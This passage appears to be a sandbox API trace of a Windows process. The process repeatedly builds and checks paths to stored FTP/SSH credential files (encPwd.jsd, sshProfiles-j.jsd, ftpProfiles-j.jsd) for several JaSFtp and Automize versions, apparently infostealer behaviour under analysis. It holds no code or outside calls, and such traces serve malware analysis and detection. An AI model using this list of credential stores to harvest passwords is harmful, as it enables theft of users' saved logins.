hHeap=0x6a0000) returned 1 [0128.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.209] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.210] GetProcessHeap () returned 0x6a0000 [0128.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.212] GetProcessHeap () returned 0x6a0000 [0128.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.225] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.226] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0128.226] GetProcessHeap () returned 0x6a0000 [0128.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.226] GetProcessHeap () returned 0x6a0000 [0128.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.228] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.231] GetProcessHeap () returned 0x6a0000 [0128.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.231] GetProcessHeap () returned 0x6a0000 [0128.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.232] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.233] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 41 [0128.233] GetProcessHeap () returned 0x6a0000 [0128.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x56) returned 0x6b9518 [0128.233] GetProcessHeap () returned 0x6a0000 [0128.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.234] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\encPwd.jsd") returned 0 [0128.235] GetProcessHeap () returned 0x6a0000 [0128.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.236] GetProcessHeap () returned 0x6a0000 [0128.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.236] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.237] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 62 [0128.237] GetProcessHeap () returned 0x6a0000 [0128.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.237] GetProcessHeap () returned 0x6a0000 [0128.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.239] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.239] GetProcessHeap () returned 0x6a0000 [0128.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.240] GetProcessHeap () returned 0x6a0000 [0128.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.241] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.242] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0128.242] GetProcessHeap () returned 0x6a0000 [0128.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6b9518 [0128.242] GetProcessHeap () returned 0x6a0000 [0128.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.243] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.244] GetProcessHeap () returned 0x6a0000 [0128.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.244] GetProcessHeap () returned 0x6a0000 [0128.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.246] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 42 [0128.246] GetProcessHeap () returned 0x6a0000 [0128.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.246] GetProcessHeap () returned 0x6a0000 [0128.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.247] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\encPwd.jsd") returned 0 [0128.248] GetProcessHeap () returned 0x6a0000 [0128.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.248] GetProcessHeap () returned 0x6a0000 [0128.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.249] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.250] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.250] GetProcessHeap () returned 0x6a0000 [0128.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.250] GetProcessHeap () returned 0x6a0000 [0128.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.252] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.252] GetProcessHeap () returned 0x6a0000 [0128.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.253] GetProcessHeap () returned 0x6a0000 [0128.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.254] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.410] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.410] GetProcessHeap () returned 0x6a0000 [0128.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.411] GetProcessHeap () returned 0x6a0000 [0128.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.412] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.412] GetProcessHeap () returned 0x6a0000 [0128.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.415] GetProcessHeap () returned 0x6a0000 [0128.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.416] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.417] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 42 [0128.417] GetProcessHeap () returned 0x6a0000 [0128.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.417] GetProcessHeap () returned 0x6a0000 [0128.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.419] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\encPwd.jsd") returned 0 [0128.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.420] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.421] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.423] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.424] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.425] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.427] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.428] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.429] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0128.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.430] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0128.430] GetProcessHeap () returned 0x6a0000 [0128.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.431] GetProcessHeap () returned 0x6a0000 [0128.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.432] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.432] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.432] GetProcessHeap () returned 0x6a0000 [0128.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.432] GetProcessHeap () returned 0x6a0000 [0128.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.434] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.434] GetProcessHeap () returned 0x6a0000 [0128.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.435] GetProcessHeap () returned 0x6a0000 [0128.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.436] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.436] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.436] GetProcessHeap () returned 0x6a0000 [0128.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.437] GetProcessHeap () returned 0x6a0000 [0128.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.438] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.438] GetProcessHeap () returned 0x6a0000 [0128.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.439] GetProcessHeap () returned 0x6a0000 [0128.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.440] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.440] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0128.440] GetProcessHeap () returned 0x6a0000 [0128.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.441] GetProcessHeap () returned 0x6a0000 [0128.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.442] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0128.442] GetProcessHeap () returned 0x6a0000 [0128.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.443] GetProcessHeap () returned 0x6a0000 [0128.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.444] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.445] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.445] GetProcessHeap () returned 0x6a0000 [0128.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.445] GetProcessHeap () returned 0x6a0000 [0128.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.447] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.447] GetProcessHeap () returned 0x6a0000 [0128.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.448] GetProcessHeap () returned 0x6a0000 [0128.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.448] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.449] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.449] GetProcessHeap () returned 0x6a0000 [0128.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.449] GetProcessHeap () returned 0x6a0000 [0128.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.451] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.451] GetProcessHeap () returned 0x6a0000 [0128.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.451] GetProcessHeap () returned 0x6a0000 [0128.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.459] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.460] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0128.460] GetProcessHeap () returned 0x6a0000 [0128.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x6b9518 [0128.460] GetProcessHeap () returned 0x6a0000 [0128.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.462] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0128.462] GetProcessHeap () returned 0x6a0000 [0128.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.463] GetProcessHeap () returned 0x6a0000 [0128.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.464] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.465] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0128.465] GetProcessHeap () returned 0x6a0000 [0128.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.465] GetProcessHeap () returned 0x6a0000 [0128.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.466] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.466] GetProcessHeap () returned 0x6a0000 [0128.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.467] GetProcessHeap () returned 0x6a0000 [0128.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.468] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.469] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0128.469] GetProcessHeap () returned 0x6a0000 [0128.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6bac30 [0128.469] GetProcessHeap () returned 0x6a0000 [0128.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.471] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.471] GetProcessHeap () returned 0x6a0000 [0128.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.472] GetProcessHeap () returned 0x6a0000 [0128.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.472] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.473] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0128.473] GetProcessHeap () returned 0x6a0000 [0128.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.473] GetProcessHeap () returned 0x6a0000 [0128.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.475] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0128.475] GetProcessHeap () returned 0x6a0000 [0128.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.475] GetProcessHeap () returned 0x6a0000 [0128.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.478] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.479] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.479] GetProcessHeap () returned 0x6a0000 [0128.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.479] GetProcessHeap () returned 0x6a0000 [0128.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.480] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.481] GetProcessHeap () returned 0x6a0000 [0128.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.481] GetProcessHeap () returned 0x6a0000 [0128.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.482] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.483] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.483] GetProcessHeap () returned 0x6a0000 [0128.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.483] GetProcessHeap () returned 0x6a0000 [0128.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.485] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0128.485] GetProcessHeap () returned 0x6a0000 [0128.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.485] GetProcessHeap () returned 0x6a0000 [0128.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bb458 [0128.486] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.487] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0128.487] GetProcessHeap () returned 0x6a0000 [0128.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b9518 [0128.487] GetProcessHeap () returned 0x6a0000 [0128.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.489] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0128.489] GetProcessHeap () returned 0x6a0000 [0128.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0128.490] GetProcessHeap () returned 0x6a0000 [0128.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.491] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.492] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0128.492] GetProcessHeap () returned 0x6a0000 [0128.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.492] GetProcessHeap () returned 0x6a0000 [0128.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.493] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0128.494] GetProcessHeap () returned 0x6a0000 [0128.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0128.494] GetProcessHeap () returned 0x6a0000 [0128.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0128.495] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0128.496] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0128.496] GetProcessHeap () returned 0x6a0000 [0128.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6bac30 [0128.496] GetProcessHeap () returned 0x6a0000 [0128.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0128.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0128.507] PathFileExistsW (pszPath="C:\\Program Files 